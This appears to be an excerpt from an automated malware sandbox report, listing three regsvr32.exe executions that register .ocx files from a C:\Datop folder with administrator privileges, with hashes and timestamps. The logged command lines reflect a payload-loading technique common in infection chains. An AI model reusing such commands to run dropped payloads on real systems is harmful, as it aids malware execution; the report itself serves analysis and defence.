                                  General

                                  Start time:14:30:30
                                  Start date:25/11/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
                                  Imagebase:0xff7e0000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:14:30:31
                                  Start date:25/11/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
                                  Imagebase:0xff7e0000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:14:30:31
                                  Start date:25/11/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
                                  Imagebase:0xff7e0000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Disassembly

                                  Code Analysis

                                  Reset < >